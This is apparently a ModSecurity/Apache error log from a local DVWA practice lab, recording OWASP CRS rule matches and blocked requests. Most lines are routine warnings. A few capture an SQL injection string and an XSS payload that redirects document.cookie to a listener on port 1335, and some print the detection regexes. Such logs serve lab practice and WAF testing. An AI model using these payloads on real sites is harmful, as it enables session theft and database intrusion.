[Wed Jul 15 22:46:34.097430 2026] [php:error] [pid 5767:tid 5767] [client 127.0.0.1:48982] PHP Fatal error:  Uncaught mysqli_sql_exception: Connection refused in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php:570\nStack trace:\n#0 /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php(570): mysqli_connect()\n#1 /var/www/html/DVWA/login.php(8): dvwaDatabaseConnect()\n#2 {main}\n  thrown in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php on line 570, referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:46:34.111237 2026] [security2:error] [pid 5767:tid 5767] [client 127.0.0.1:48982] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=3, detection=3, per_pl=3-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=3)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/login.php"] [unique_id "alf_unnTQ49Xc0qkfdD30wAAAAQ"], referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:47:02.924793 2026] [security2:error] [pid 5763:tid 5763] [client 127.0.0.1:36392] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/login.php"] [unique_id "alf_1pv5LA6p2XNixvlQzgAAAAA"], referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:47:02.948064 2026] [security2:error] [pid 5763:tid 5763] [client 127.0.0.1:36392] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=3, detection=3, per_pl=3-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=3)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/login.php"] [unique_id "alf_1pv5LA6p2XNixvlQzgAAAAA"], referer: http://127.0.0.1/DVWA/vulnerabilities/xss_d/?default=English
[Wed Jul 15 22:47:15.070744 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:41300] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/login.php"] [unique_id "alf_4_6csk-W9Z63kDBqMQAAAAI"], referer: http://127.0.0.1/DVWA/login.php
[Wed Jul 15 22:47:15.089928 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:41300] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=3, detection=3, per_pl=3-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=3)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/login.php"] [unique_id "alf_4_6csk-W9Z63kDBqMQAAAAI"], referer: http://127.0.0.1/DVWA/login.php
[Wed Jul 15 22:47:15.106454 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:41300] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/index.php"] [unique_id "alf_4_6csk-W9Z63kDBqMgAAAAI"], referer: http://127.0.0.1/DVWA/login.php
[Wed Jul 15 22:47:15.117477 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:41300] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=3, detection=3, per_pl=3-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=3)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/index.php"] [unique_id "alf_4_6csk-W9Z63kDBqMgAAAAI"], referer: http://127.0.0.1/DVWA/login.php
[Wed Jul 15 22:47:17.129452 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:41300] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf_5f6csk-W9Z63kDBqMwAAAAI"], referer: http://127.0.0.1/DVWA/index.php
[Wed Jul 15 22:47:17.146702 2026] [security2:error] [pid 5765:tid 5765] [client 127.0.0.1:41300] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=3, detection=3, per_pl=3-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=3)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/index.php"] [unique_id "alf_5f6csk-W9Z63kDBqMwAAAAI"], referer: http://127.0.0.1/DVWA/index.php
[Wed Jul 15 22:47:27.980131 2026] [security2:error] [pid 5766:tid 5766] [client 127.0.0.1:55532] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf_778V_730FIs4GP3RswAAAAM"], referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
[Wed Jul 15 22:47:27.995664 2026] [security2:error] [pid 5766:tid 5766] [client 127.0.0.1:55532] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&sos' [file "/etc/modsecurity/crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "66"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&sos found within ARGS:id: 1' or  '1' = '1"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-SQLI"] [tag "capec/1000/152/248/66"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf_778V_730FIs4GP3RswAAAAM"], referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
[Wed Jul 15 22:47:27.997151 2026] [security2:error] [pid 5766:tid 5766] [client 127.0.0.1:55532] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/etc/modsecurity/crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "233"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "anomaly-evaluation"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf_778V_730FIs4GP3RswAAAAM"], referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
[Wed Jul 15 22:47:27.997548 2026] [security2:error] [pid 5766:tid 5766] [client 127.0.0.1:55532] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=8, detection=8, per_pl=8-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=5, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=8)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/sqli/"] [unique_id "alf_778V_730FIs4GP3RswAAAAM"], referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
[Wed Jul 15 22:47:45.956165 2026] [security2:error] [pid 5767:tid 5767] [client 127.0.0.1:49416] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/"] [unique_id "algAAXnTQ49Xc0qkfdD31AAAAAQ"], referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
[Wed Jul 15 22:47:45.967939 2026] [security2:error] [pid 5767:tid 5767] [client 127.0.0.1:49416] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=3, detection=3, per_pl=3-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=0, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=3)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/index.php"] [unique_id "algAAXnTQ49Xc0qkfdD31AAAAAQ"], referer: http://127.0.0.1/DVWA/vulnerabilities/sqli/
[Wed Jul 15 22:48:17.326844 2026] [security2:error] [pid 5829:tid 5829] [client 127.0.0.1:35218] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "127.0.0.1"] [severity "WARNING"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/%3Cscript%3Ewindow.location=http://127.0.0.1:1335/"] [unique_id "algAIabvwagO5nCfTv578gAAAAU"]
[Wed Jul 15 22:48:17.336143 2026] [security2:error] [pid 5829:tid 5829] [client 127.0.0.1:35218] ModSecurity: Warning. Pattern match "(?i)<script[^>]*>[\\\\s\\\\S]*?" at REQUEST_FILENAME. [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "130"] [id "941110"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script> found within REQUEST_FILENAME: /DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [unique_id "algAIabvwagO5nCfTv578gAAAAU"]
[Wed Jul 15 22:48:17.336398 2026] [security2:error] [pid 5829:tid 5829] [client 127.0.0.1:35218] ModSecurity: Warning. Pattern match "(?i)<[^0-9<>A-Z_a-z]*(?:[^\\\\s\\\\x0b\\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0- ..." at ARGS:cookie . [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "273"] [id "941160"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: </script found within ARGS:cookie : '   document.cookie'</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [unique_id "algAIabvwagO5nCfTv578gAAAAU"]
[Wed Jul 15 22:48:17.336479 2026] [security2:error] [pid 5829:tid 5829] [client 127.0.0.1:35218] ModSecurity: Warning. Pattern match "(?i)<[^0-9<>A-Z_a-z]*(?:[^\\\\s\\\\x0b\\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0- ..." at REQUEST_FILENAME. [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "273"] [id "941160"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <script found within REQUEST_FILENAME: /DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [unique_id "algAIabvwagO5nCfTv578gAAAAU"]
[Wed Jul 15 22:48:17.336600 2026] [security2:error] [pid 5829:tid 5829] [client 127.0.0.1:35218] ModSecurity: Warning. Matched phrase "document.cookie" at ARGS:cookie . [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "332"] [id "941180"] [msg "Node-Validator Deny List Keywords"] [data "Matched Data: document.cookie found within ARGS:cookie : '   document.cookie'</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-nodejs"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [unique_id "algAIabvwagO5nCfTv578gAAAAU"]
[Wed Jul 15 22:48:17.336637 2026] [security2:error] [pid 5829:tid 5829] [client 127.0.0.1:35218] ModSecurity: Warning. Matched phrase "window.location" at REQUEST_FILENAME. [file "/etc/modsecurity/crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "332"] [id "941180"] [msg "Node-Validator Deny List Keywords"] [data "Matched Data: window.location found within REQUEST_FILENAME: /DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [severity "CRITICAL"] [ver "OWASP_CRS/4.29.0-dev"] [tag "application-multi"] [tag "language-multi"] [tag "platform-nodejs"] [tag "attack-xss"] [tag "xss-perf-disable"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/ATTACK-XSS"] [tag "capec/1000/152/242"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [unique_id "algAIabvwagO5nCfTv578gAAAAU"]
[Wed Jul 15 22:48:17.337130 2026] [security2:error] [pid 5829:tid 5829] [client 127.0.0.1:35218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/etc/modsecurity/crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "233"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 28)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "anomaly-evaluation"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [unique_id "algAIabvwagO5nCfTv578gAAAAU"]
[Wed Jul 15 22:48:17.337279 2026] [security2:error] [pid 5829:tid 5829] [client 127.0.0.1:35218] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=28, detection=28, per_pl=28-0-0-0, threshold=5) - (Outbound Scores: blocking=0, detection=0, per_pl=0-0-0-0, threshold=4) - (SQLI=0, XSS=25, RFI=0, LFI=0, RCE=0, PHPI=0, HTTP=0, SESS=0, COMBINED_SCORE=28)"] [ver "OWASP_CRS/4.29.0-dev"] [tag "reporting"] [tag "OWASP_CRS"] [hostname "127.0.0.1"] [uri "/DVWA/vulnerabilities/xss_d/<script>window.location=http:/127.0.0.1:1335/"] [unique_id "algAIabvwagO5nCfTv578gAAAAU"]
